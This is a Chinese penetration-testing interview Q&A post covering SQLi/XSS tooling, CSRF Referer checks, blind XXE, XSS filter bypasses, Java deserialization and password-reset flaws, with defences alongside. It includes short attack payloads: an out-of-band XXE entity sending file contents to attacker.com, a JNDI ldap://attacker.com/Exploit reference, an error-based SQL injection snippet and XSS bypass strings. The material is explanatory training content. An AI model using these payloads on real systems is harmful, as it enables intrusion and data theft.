2025年渗透测试面试题总结-109(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
0. 自我介绍
1. SQL注入 & XSS 工具设计思路
2. CSRF防御:Referer验证强化方案
3. XXE无回显漏洞探测技术
4. 硬编码XSS的突破方法
5. Java反序列化漏洞基础
6. 白盒审计能力提升路径
7. 密码重置逻辑漏洞大全
总结图谱
0、自我介绍 1、编写工具的具体思路,sql注入,xss 2、csrf的防御, referer验证,referer为空则防御(referer是浏览器特性,为空排除特性之外的问题则做防御验证) 3、xxe无回显探测 dns验证,内部实体探测 4、xss硬编码如何利用 5、java反序列化基础 6、白盒审计能力问题 7、密码重置处的逻辑问题
0. 自我介绍
我是一名专注于应用安全的深度知识模型,擅长Web漏洞原理分析(SQLi/XSS/XXE)、代码审计(Java/PHP)、安全工具设计及攻防对抗策略。可为渗透测试、红队演练、安全开发提供全链路技术支撑。
1. SQL注入 & XSS 工具设计思路
核心架构:自动化漏洞探测框架
mermaid
graph LR A[输入检测] --> B{漏洞类型} B -->|SQLi| C[Payload生成器] B -->|XSS| D[多上下文检测引擎] C --> E[布尔盲注/时间盲注模块] D --> F[DOM/反射/存储型XSS验证] E --> G[数据库指纹识别] F --> H[浏览器行为模拟] G --> I[自动化数据提取] H --> J[跨浏览器兼容性测试]
关键技术:
- SQL注入:
- 基于语法树解析的边界检测算法(识别
' " )
等边界符)- 联合查询与报错注入自动化转换(如
extractvalue(1,concat(0x7e,version()))
)- XSS利用:
- 上下文感知编码(HTML/JS/URI 动态切换编码方案)
- DOM污染检测(监控
document.write
/innerHTML
等危险函数)
2. CSRF防御:Referer验证强化方案
防御逻辑流程图:
mermaid
sequenceDiagram 用户请求->> 服务器: 提交敏感操作 服务器-->> 验证模块: 检查Referer头 alt Referer存在且合法 验证模块-->> 业务层: 放行请求 else Referer为空 验证模块-->> 二次验证: 触发CAPTCHA或Token验证 end
关键增强点:
- 空Referer处理:
- 区分浏览器隐私模式(合法空Referer)与恶意绕过(非浏览器环境)
- 启用动态令牌二次认证(如JWT短期令牌)
- Referer校验规则:
- 白名单域名正则强化(避免
*.example.com.*
误匹配)- 协议校验(拒绝HTTP敏感操作)
3. XXE无回显漏洞探测技术
双通道探测方案:
方法 原理 工具示例 DNS外带 强制服务器解析恶意DNS <!ENTITY % x "<!ENTITY % y SYSTEM 'http://attacker.com/?p=%file;'>">
内部实体耗尽 触发内存/CPU异常 构造递归实体链(如Billion Laughs攻击) 报错回显 通过报错信息间接获取数据 结合PHP的 expect://
封装器实战技巧:
- DNS验证使用短域名服务(如dnslog.cn )
- 递归实体层数动态调整(规避WAF正则检测)
4. 硬编码XSS的突破方法
绕过策略矩阵:
防御类型 绕过方案 输入长度限制 利用JS注释拆分 //
或/**/
关键字过滤 Unicode混淆( \u003cscript\u003e
)内容安全策略(CSP) 内联事件注入( <img src=x onerror=alert(1)>
)输出编码 编码上下文逃逸( </script><script>alert(1)</script>
)
5. Java反序列化漏洞基础
攻击链三要素:
- 入口点:
ObjectInputStream.readObject()
(如HTTP参数/RMI协议)- 利用库:
库名 Gadget链示例 CommonsCollections AnnotationInvocationHandler→TransformedMap
Fastjson JdbcRowSetImpl→JNDI注入
- 执行载体:
- 动态类加载(URLClassLoader)
- JNDI引用注入(
ldap://attacker.com/Exploit
)防护方案:
- 使用白名单校验(Apache Serialization Filter)
- 运行时监控(JRASP注入检测)
6. 白盒审计能力提升路径
四维审计框架:
mermaid
graph TD A[源码扫描] --> B[数据流分析] A --> C[控制流分析] B --> D[污点传播追踪] C --> E[危险函数回溯] D --> F[漏洞确认] E --> F
关键能力:
- 跨文件追踪(Spring MVC路由解析 → 参数处理链)
- 框架特性认知(MyBatis的
${}
与#{}
注入风险差异)- 语义理解(识别
@PreAuthorize
权限绕过)
7. 密码重置逻辑漏洞大全
高危漏洞场景:
漏洞类型 攻击手法 修复方案 邮箱劫持 修改Host头伪造邮件链接 链接绑定用户设备指纹 验证码爆破 4位验证码暴力破解(10^4次尝试) 增加错误次数限制 响应包泄露 通过HTTP响应判断用户是否存在 统一模糊提示(“操作成功”) Token未绑定 重置链接未关联用户账户 Token与用户ID强绑定
总结图谱
mermaid
mindmap root((Web安全核心)) SQL注入--> 工具设计 XSS--> 硬编码绕过 CSRF--> Referer防御 XXE--> 无回显探测 Java反序列化--> 利用链 白盒审计--> 数据流追踪 密码重置--> 业务逻辑漏洞